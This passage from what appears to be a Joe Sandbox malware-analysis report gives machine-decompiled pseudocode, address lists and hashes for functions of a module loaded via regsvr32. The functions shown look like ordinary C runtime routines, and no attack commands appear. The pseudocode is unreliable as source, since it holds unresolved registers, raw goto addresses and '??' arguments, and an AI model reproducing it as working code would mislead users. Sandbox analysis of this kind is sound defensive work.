				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000002;
				goto 0x8001a998;
				 *(_t135 + 0x34) =  *(_t135 + 0x34) & 0x00000000;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) & 0x00000000;
				 *(_t135 + 0x3c) =  *(_t135 + 0x3c) & 0x00000000;
				 *((char*)(_t135 + 0x40)) = 0;
				 *(_t135 + 0x38) = _t107;
				 *((char*)(_t135 + 0x54)) = 0;
				goto 0x8001a998;
				if (E0000000118001C5EC(_t135) == 0) goto 0x8001a9e3;
				_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x18))));
				 *((char*)(_t135 + 0x41)) = _t103;
				if (_t103 != 0) goto 0x8001a84a;
				 *((long long*)(_t135 + 0x18)) =  *((long long*)(_t135 + 0x18)) + 1;
				 *((intOrPtr*)(_t135 + 0x470)) =  *((intOrPtr*)(_t135 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t135 + 0x470)) != 2) goto 0x8001a83d;
				return  *((intOrPtr*)(_t135 + 0x28));
			}
















                                                                                                    0x18001a7d8
                                                                                                    0x18001a7d8
                                                                                                    0x18001a7dd
                                                                                                    0x18001a7e7
                                                                                                    0x18001a7f4
                                                                                                    0x18001a7f6
                                                                                                    0x18001a7fb
                                                                                                    0x18001a801
                                                                                                    0x18001a806
                                                                                                    0x18001a80f
                                                                                                    0x18001a814
                                                                                                    0x18001a81e
                                                                                                    0x18001a820
                                                                                                    0x18001a82d
                                                                                                    0x18001a833
                                                                                                    0x18001a83d
                                                                                                    0x18001a841
                                                                                                    0x18001a845
                                                                                                    0x18001a84a
                                                                                                    0x18001a852
                                                                                                    0x18001a862
                                                                                                    0x18001a864
                                                                                                    0x18001a871
                                                                                                    0x18001a87c
                                                                                                    0x18001a87f
                                                                                                    0x18001a885
                                                                                                    0x18001a88b
                                                                                                    0x18001a88d
                                                                                                    0x18001a896
                                                                                                    0x18001a89f
                                                                                                    0x18001a8a8
                                                                                                    0x18001a8ad
                                                                                                    0x18001a8b2
                                                                                                    0x18001a8b7
                                                                                                    0x18001a8bc
                                                                                                    0x18001a8c5
                                                                                                    0x18001a8ca
                                                                                                    0x18001a8d2
                                                                                                    0x18001a8d7
                                                                                                    0x18001a8e0
                                                                                                    0x18001a8e9
                                                                                                    0x18001a8ee
                                                                                                    0x18001a8f3
                                                                                                    0x18001a8fc
                                                                                                    0x18001a901
                                                                                                    0x18001a904
                                                                                                    0x18001a907
                                                                                                    0x18001a909
                                                                                                    0x18001a90d
                                                                                                    0x18001a916
                                                                                                    0x18001a91c
                                                                                                    0x18001a91e
                                                                                                    0x18001a927
                                                                                                    0x18001a92a
                                                                                                    0x18001a92f
                                                                                                    0x18001a931
                                                                                                    0x18001a937
                                                                                                    0x18001a93c
                                                                                                    0x18001a93e
                                                                                                    0x18001a943
                                                                                                    0x18001a947
                                                                                                    0x18001a94b
                                                                                                    0x18001a94f
                                                                                                    0x18001a953
                                                                                                    0x18001a955
                                                                                                    0x18001a959
                                                                                                    0x18001a95b
                                                                                                    0x18001a95f
                                                                                                    0x18001a961
                                                                                                    0x18001a965
                                                                                                    0x18001a967
                                                                                                    0x18001a96b
                                                                                                    0x18001a96d
                                                                                                    0x18001a971
                                                                                                    0x18001a973
                                                                                                    0x18001a977
                                                                                                    0x18001a97b
                                                                                                    0x18001a97f
                                                                                                    0x18001a983
                                                                                                    0x18001a986
                                                                                                    0x18001a98a
                                                                                                    0x18001a996
                                                                                                    0x18001a99c
                                                                                                    0x18001a99e
                                                                                                    0x18001a9a3
                                                                                                    0x18001a9a9
                                                                                                    0x18001a9ad
                                                                                                    0x18001a9ba
                                                                                                    0x18001a9d2

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: $*
                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                    • Opcode ID: 8791bb5291c8a54b6f5cb6149d029ab0917721486a644981b7c96b5714b01417
                                                                                                    • Instruction ID: 75d8e2fa7e98db4d58faf5dd74f8f08fa8bfbcc6bef111fdbd9babef0e6656a7
                                                                                                    • Opcode Fuzzy Hash: 8791bb5291c8a54b6f5cb6149d029ab0917721486a644981b7c96b5714b01417
                                                                                                    • Instruction Fuzzy Hash: CB61537250CA488AFBEB8E3480453ED3BA1F35FB9CF15911AEA46462D9CF24C6C9D701
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001AE8C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 65%
                                                                                                    			E0000000118001AE8C(signed int __edi, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
				void* _t73;
				unsigned int _t80;
				intOrPtr _t91;
				signed int _t97;
				signed int _t99;
				char _t101;
				signed int _t104;
				unsigned int _t111;
				void* _t131;
				void* _t141;

				_a8 = __rbx;
				_a16 = __rbp;
				_t131 = __rcx;
				if ( *((long long*)(__rcx + 0x468)) != 0) goto 0x8001aec0;
				_t73 = E0000000118002E69C(__rax);
				 *__rax = 0x16;
				E0000000118002E4F0(_t73);
				goto 0x8001b06a;
				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0x8001aea8;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x8001b067;
				_t104 = __edi | 0xffffffff;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0x8001b03f;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x8001b054;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x8001af1a;
				_t126 =  *((char*)(__rcx + 0x41));
				goto 0x8001af1c;
				_t80 = ( *( *((char*)(__rcx + 0x41)) + 0x8004b9e0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t80;
				if (_t80 == 8) goto 0x8001b07a;
				_t111 = _t80;
				if (_t111 == 0) goto 0x8001b033;
				if (_t111 == 0) goto 0x8001b01a;
				if (_t111 == 0) goto 0x8001afe5;
				if (_t111 == 0) goto 0x8001afb9;
				if (_t111 == 0) goto 0x8001afb0;
				if (_t111 == 0) goto 0x8001af83;
				if (_t111 == 0) goto 0x8001af76;
				if (_t80 - 0xfffffffffffffffc != 1) goto 0x8001b08a;
				E0000000118001F53C( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t141, 0x8004b9e0);
				goto 0x8001b03b;
				E0000000118001DD54(_t126, _t131);
				goto 0x8001b03b;
				if ( *((char*)(_t131 + 0x41)) == 0x2a) goto 0x8001af9a;
				E00000001180019F94(_t131, _t131, _t131 + 0x38);
				goto 0x8001b03b;
				 *((long long*)(_t131 + 0x20)) =  *((long long*)(_t131 + 0x20)) + 8;
				_t97 =  *( *((intOrPtr*)(_t131 + 0x20)) - 8);
				_t98 =  <  ? _t104 : _t97;
				 *(_t131 + 0x38) =  <  ? _t104 : _t97;
				goto 0x8001afe1;
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				goto 0x8001b03f;
				if ( *((char*)(_t131 + 0x41)) == 0x2a) goto 0x8001afc5;
				goto 0x8001af8d;
				 *((long long*)(_t131 + 0x20)) =  *((long long*)(_t131 + 0x20)) + 8;
				_t99 =  *( *((intOrPtr*)(_t131 + 0x20)) - 8);
				 *(_t131 + 0x34) = _t99;
				if (_t99 >= 0) goto 0x8001afe1;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000004;
				 *(_t131 + 0x34) =  ~_t99;
				goto 0x8001b03b;
				_t91 =  *((intOrPtr*)(_t131 + 0x41));
				if (_t91 == 0x20) goto 0x8001b014;
				if (_t91 == 0x23) goto 0x8001b00e;
				if (_t91 == 0x2b) goto 0x8001b008;
				if (_t91 == 0x2d) goto 0x8001b002;
				if (_t91 != 0x30) goto 0x8001b03f;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000008;
				goto 0x8001b03f;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000004;
				goto 0x8001b03f;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000001;
				goto 0x8001b03f;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000020;
				goto 0x8001b03f;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) | 0x00000002;
				goto 0x8001b03f;
				 *(_t131 + 0x34) =  *(_t131 + 0x34) & 0x00000000;
				 *(_t131 + 0x30) =  *(_t131 + 0x30) & 0x00000000;
				 *(_t131 + 0x3c) =  *(_t131 + 0x3c) & 0x00000000;
				 *((char*)(_t131 + 0x40)) = 0;
				 *(_t131 + 0x38) = _t104;
				 *((char*)(_t131 + 0x54)) = 0;
				goto 0x8001b03f;
				if (E0000000118001C76C(_t131) == 0) goto 0x8001b08a;
				_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t131 + 0x18))));
				 *((char*)(_t131 + 0x41)) = _t101;
				if (_t101 != 0) goto 0x8001aef1;
				 *((long long*)(_t131 + 0x18)) =  *((long long*)(_t131 + 0x18)) + 1;
				 *((intOrPtr*)(_t131 + 0x470)) =  *((intOrPtr*)(_t131 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t131 + 0x470)) != 2) goto 0x8001aee4;
				return  *((intOrPtr*)(_t131 + 0x28));
			}













                                                                                                    0x18001ae8c
                                                                                                    0x18001ae91
                                                                                                    0x18001aea3
                                                                                                    0x18001aea6
                                                                                                    0x18001aea8
                                                                                                    0x18001aead
                                                                                                    0x18001aeb3
                                                                                                    0x18001aebb
                                                                                                    0x18001aec5
                                                                                                    0x18001aec7
                                                                                                    0x18001aed4
                                                                                                    0x18001aeda
                                                                                                    0x18001aee4
                                                                                                    0x18001aee8
                                                                                                    0x18001aeec
                                                                                                    0x18001aef1
                                                                                                    0x18001aef9
                                                                                                    0x18001af09
                                                                                                    0x18001af0b
                                                                                                    0x18001af18
                                                                                                    0x18001af23
                                                                                                    0x18001af26
                                                                                                    0x18001af2c
                                                                                                    0x18001af32
                                                                                                    0x18001af34
                                                                                                    0x18001af3d
                                                                                                    0x18001af46
                                                                                                    0x18001af4f
                                                                                                    0x18001af54
                                                                                                    0x18001af59
                                                                                                    0x18001af5e
                                                                                                    0x18001af63
                                                                                                    0x18001af6c
                                                                                                    0x18001af71
                                                                                                    0x18001af79
                                                                                                    0x18001af7e
                                                                                                    0x18001af87
                                                                                                    0x18001af90
                                                                                                    0x18001af95
                                                                                                    0x18001af9a
                                                                                                    0x18001afa3
                                                                                                    0x18001afa8
                                                                                                    0x18001afab
                                                                                                    0x18001afae
                                                                                                    0x18001afb0
                                                                                                    0x18001afb4
                                                                                                    0x18001afbd
                                                                                                    0x18001afc3
                                                                                                    0x18001afc5
                                                                                                    0x18001afce
                                                                                                    0x18001afd1
                                                                                                    0x18001afd6
                                                                                                    0x18001afd8
                                                                                                    0x18001afde
                                                                                                    0x18001afe3
                                                                                                    0x18001afe5
                                                                                                    0x18001afea
                                                                                                    0x18001afee
                                                                                                    0x18001aff2
                                                                                                    0x18001aff6
                                                                                                    0x18001affa
                                                                                                    0x18001affc
                                                                                                    0x18001b000
                                                                                                    0x18001b002
                                                                                                    0x18001b006
                                                                                                    0x18001b008
                                                                                                    0x18001b00c
                                                                                                    0x18001b00e
                                                                                                    0x18001b012
                                                                                                    0x18001b014
                                                                                                    0x18001b018
                                                                                                    0x18001b01a
                                                                                                    0x18001b01e
                                                                                                    0x18001b022
                                                                                                    0x18001b026
                                                                                                    0x18001b02a
                                                                                                    0x18001b02d
                                                                                                    0x18001b031
                                                                                                    0x18001b03d
                                                                                                    0x18001b043
                                                                                                    0x18001b045
                                                                                                    0x18001b04a
                                                                                                    0x18001b050
                                                                                                    0x18001b054
                                                                                                    0x18001b061
                                                                                                    0x18001b079

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID: $*
                                                                                                    • API String ID: 3215553584-3982473090
                                                                                                    • Opcode ID: af62d223a810fca7901134a57f0ac1ed5c2924bbdc0aa336aac8803c077634e9
                                                                                                    • Instruction ID: 234c99f4c9affb2cb64c67356a216f14d839bf9eae2f9e344765117dc06d7ce9
                                                                                                    • Opcode Fuzzy Hash: af62d223a810fca7901134a57f0ac1ed5c2924bbdc0aa336aac8803c077634e9
                                                                                                    • Instruction Fuzzy Hash: 9C515672108A488AF7E79F3880583ED3BE5F31EBD9F149119E656851E9CF35C68AC701
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180042548 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100fileCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                                    • String ID: U
                                                                                                    • API String ID: 2456169464-4171548499
                                                                                                    • Opcode ID: 4b3e75ea491ac17d33e71a045847b4321692c159f3e1dd20a352cde406c3410b
                                                                                                    • Instruction ID: 08caff46d29952f4ff9f3585d76338e8eca534949daaa6eb475d262c27c4bed4
                                                                                                    • Opcode Fuzzy Hash: 4b3e75ea491ac17d33e71a045847b4321692c159f3e1dd20a352cde406c3410b
                                                                                                    • Instruction Fuzzy Hash: 1B41A332715A8882EB619F25E8443EAB7A1F3887D8F828021FE4D87798DF7CC645C744
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00000001800061BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 60%
                                                                                                    			E000000011800061BB(void* __rax, intOrPtr _a32, void* _a40, intOrPtr _a48, intOrPtr _a56, long long _a64, long long _a72, long long _a224, intOrPtr _a232, intOrPtr* _a248) {
				void* _t38;
				intOrPtr _t52;
				intOrPtr* _t63;

				_a32 = 1;
				E00000001180003A80(__rax);
				 *(__rax + 0x40) =  *(__rax + 0x40) & 0x00000000;
				_t63 = _a248;
				if (_a232 == 0) goto 0x800061fc;
				E000000011800032D4(1, _t63);
				_t52 = _a48;
				r8d =  *((intOrPtr*)(_t52 + 0x18));
				goto 0x80006209;
				r8d =  *((intOrPtr*)(_t63 + 0x18));
				RaiseException(??, ??, ??, ??);
				r15d = _a32;
				E000000011800030F4(_t52, _a56, _a56);
				if (r15d != 0) goto 0x80006267;
				if ( *_t63 != 0xe06d7363) goto 0x80006267;
				if ( *((intOrPtr*)(_t63 + 0x18)) != 4) goto 0x80006267;
				if ( *((intOrPtr*)(_t63 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80006267;
				if (E00000001180003354(_t52,  *((intOrPtr*)(_t63 + 0x28))) == 0) goto 0x80006267;
				E000000011800032D4(1, _t63);
				E00000001180003A80(_t52);
				 *((long long*)(_t52 + 0x20)) = _a64;
				E00000001180003A80(_t52);
				 *((long long*)(_t52 + 0x28)) = _a72;
				E00000001180003A80(_t52);
				 *((long long*)(_t52 + 0x80)) = _a224;
				E00000001180003A80(_t52);
				 *((char*)(_t52 + 0x88)) = 0;
				_t38 = E00000001180003A80(_t52);
				 *((long long*)(_t52 + 0x80)) = 0xfffffffe;
				return _t38;
			}






                                                                                                    0x1800061bb
                                                                                                    0x1800061c3
                                                                                                    0x1800061c8
                                                                                                    0x1800061cc
                                                                                                    0x1800061dc
                                                                                                    0x1800061e3
                                                                                                    0x1800061e8
                                                                                                    0x1800061f1
                                                                                                    0x1800061fa
                                                                                                    0x180006200
                                                                                                    0x180006209
                                                                                                    0x18000620f
                                                                                                    0x18000622b
                                                                                                    0x180006233
                                                                                                    0x18000623b
                                                                                                    0x180006241
                                                                                                    0x18000624e
                                                                                                    0x18000625b
                                                                                                    0x180006262
                                                                                                    0x180006267
                                                                                                    0x18000626c
                                                                                                    0x180006270
                                                                                                    0x180006275
                                                                                                    0x180006281
                                                                                                    0x180006286
                                                                                                    0x18000628d
                                                                                                    0x180006292
                                                                                                    0x180006299
                                                                                                    0x18000629e
                                                                                                    0x1800062bc

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2280078643-1018135373
                                                                                                    • Opcode ID: 543a2a207d27274c6e16c66655804d11f8c12b17ed13914a48edd00c7a390fcb
                                                                                                    • Instruction ID: 4de04bd0ec1d067034d43f18fa081c78814e72ff9f2975de04ecde9cdd22ad39
                                                                                                    • Opcode Fuzzy Hash: 543a2a207d27274c6e16c66655804d11f8c12b17ed13914a48edd00c7a390fcb
                                                                                                    • Instruction Fuzzy Hash: 6231737620468886E6B2DB12E0413DE7765F389BA4F048215FBCA03796CF38D68DCB41
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180005F92 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 53%
                                                                                                    			E00000001180005F92(void* __rax, intOrPtr _a32, intOrPtr _a40, intOrPtr _a48, intOrPtr _a56, long long _a64, intOrPtr* _a80, intOrPtr _a176, intOrPtr* _a184, long long _a192, intOrPtr _a200) {
				void* _t35;
				intOrPtr _t49;
				intOrPtr* _t62;

				_a32 = 1;
				E00000001180003A80(__rax);
				 *(__rax + 0x40) =  *(__rax + 0x40) & 0x00000000;
				_t62 = _a184;
				if (_a176 == 0) goto 0x80005fd6;
				E000000011800032D4(1, _t62);
				_t49 = _a200;
				r8d =  *((intOrPtr*)(_t49 + 0x18));
				goto 0x80005fe3;
				r8d =  *((intOrPtr*)(_t62 + 0x18));
				RaiseException(??, ??, ??, ??);
				r15d = _a32;
				E000000011800030F4(_t49, _a40, _a56);
				if (r15d != 0) goto 0x80006049;
				if ( *_t62 != 0xe06d7363) goto 0x80006049;
				if ( *((intOrPtr*)(_t62 + 0x18)) != 4) goto 0x80006049;
				if ( *((intOrPtr*)(_t62 + 0x20)) - 0x19930520 - 2 > 0) goto 0x80006049;
				if (E00000001180003354(_t49,  *((intOrPtr*)(_t62 + 0x28))) == 0) goto 0x80006049;
				E000000011800032D4(1, _t62);
				E00000001180003A80(_t49);
				 *((long long*)(_t49 + 0x20)) = _a192;
				_t35 = E00000001180003A80(_t49);
				 *((long long*)(_t49 + 0x28)) = _a64;
				 *((long long*)( *((intOrPtr*)(_a48 + 0x1c)) +  *_a80)) = 0xfffffffe;
				return _t35;
			}






                                                                                                    0x180005f92
                                                                                                    0x180005f9a
                                                                                                    0x180005f9f
                                                                                                    0x180005fa3
                                                                                                    0x180005fb3
                                                                                                    0x180005fba
                                                                                                    0x180005fbf
                                                                                                    0x180005fcb
                                                                                                    0x180005fd4
                                                                                                    0x180005fda
                                                                                                    0x180005fe3
                                                                                                    0x180005fe9
                                                                                                    0x18000600d
                                                                                                    0x180006015
                                                                                                    0x18000601d
                                                                                                    0x180006023
                                                                                                    0x180006030
                                                                                                    0x18000603d
                                                                                                    0x180006044
                                                                                                    0x180006049
                                                                                                    0x18000604e
                                                                                                    0x180006052
                                                                                                    0x180006057
                                                                                                    0x180006067
                                                                                                    0x180006081

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                                                                    • String ID: csm
                                                                                                    • API String ID: 2280078643-1018135373
                                                                                                    • Opcode ID: 2b1f4a3874e6cc2947f576c693e08debc77920ca4e2969ee72353eb942e19c4e
                                                                                                    • Instruction ID: e3c2067151732d2c6f8e142278a1966ff198b219d95e40f86ba5e54386460c48
                                                                                                    • Opcode Fuzzy Hash: 2b1f4a3874e6cc2947f576c693e08debc77920ca4e2969ee72353eb942e19c4e
                                                                                                    • Instruction Fuzzy Hash: E421307620464886E7B2DF12E04139FB761F38DBA5F048215EF99037A5CF39DA8ACB01
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002D5C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 37%
                                                                                                    			E0000000118002D5C8() {
				void* _t5;
				void* _t7;
				void* _t12;

				E0000000118002CDF4(0xa, _t7, "GetEnabledXStateFeatures", _t12, 0x8004c198, "GetEnabledXStateFeatures");
				if (_t5 == 0) goto 0x8002d609;
				 *0x8004a430();
				goto __rax;
			}






                                                                                                    0x18002d5e8
                                                                                                    0x18002d5f3
                                                                                                    0x18002d5f8
                                                                                                    0x18002d606

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort
                                                                                                    • String ID: GetEnabledXStateFeatures$GetFileInformationByHandleEx
                                                                                                    • API String ID: 4206212132-684149918
                                                                                                    • Opcode ID: a8f5679b9f929d74473ed1db65e2617a6a26b2a2f625a8fa8b5cc6678f4fec61
                                                                                                    • Instruction ID: de76a327c6186efd557bf0fcb6144ae1239382605860078f6f084296934fbfdf
                                                                                                    • Opcode Fuzzy Hash: a8f5679b9f929d74473ed1db65e2617a6a26b2a2f625a8fa8b5cc6678f4fec61
                                                                                                    • Instruction Fuzzy Hash: 19119D31711B4C81FBC69B56A4847C467A0FB8DBC8F598026EE0D07BA2DE78DA49C308
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002DCE4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 37%
                                                                                                    			E0000000118002DCE4(void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t14;
				long long _t16;
				long long _t25;
				long long _t27;
				long long _t30;
				void* _t33;
				void* _t36;
				void* _t40;

				_t14 = _t33;
				 *((long long*)(_t14 + 8)) = _t16;
				 *((long long*)(_t14 + 0x10)) = _t30;
				 *((long long*)(_t14 + 0x18)) = _t27;
				 *((long long*)(_t14 + 0x20)) = _t25;
				E0000000118002CDF4(0x1b, _t16, "MessageBoxW", _t36, 0x8004c3c8, "MessageBoxW");
				if (_t14 == 0) goto 0x8002dd65;
				 *0x8004a430(_t40);
				goto __rax;
			}











                                                                                                    0x18002dce4
                                                                                                    0x18002dce7
                                                                                                    0x18002dceb
                                                                                                    0x18002dcef
                                                                                                    0x18002dcf3
                                                                                                    0x18002dd23
                                                                                                    0x18002dd2e
                                                                                                    0x18002dd33
                                                                                                    0x18002dd62

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort
                                                                                                    • String ID: MessageBoxA$MessageBoxW$RoInitialize
                                                                                                    • API String ID: 4206212132-2080375181
                                                                                                    • Opcode ID: 8e1aa4f187d90a783fc5389d335fc7af17ee8e7624d65d63bfabf7082e5a53ab
                                                                                                    • Instruction ID: 33597ebd5561337cd6b8fa6e5b27098d2ebf363e6ed4b5b1abacaa02efbf9aef
                                                                                                    • Opcode Fuzzy Hash: 8e1aa4f187d90a783fc5389d335fc7af17ee8e7624d65d63bfabf7082e5a53ab
                                                                                                    • Instruction Fuzzy Hash: 49115B31711B8881EA869F56F880BD86760FB8CFC8F59C026FE0917B55CE78C649C309
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018003010C Relevance: 6.2, APIs: 4, Instructions: 186COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 61%
                                                                                                    			E0000000118003010C(void* __ecx, void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rdx, long long __rbp, void* __r8, void* __r10, long long _a24, long long _a32) {
				signed long long _v48;
				void* _v52;
				signed int _v60;
				char _v66;
				char _v72;
				void* __rdi;
				void* __rsi;
				intOrPtr _t50;
				intOrPtr _t86;
				void* _t88;
				intOrPtr _t89;
				void* _t109;
				void* _t110;
				intOrPtr _t112;
				void* _t118;
				void* _t119;
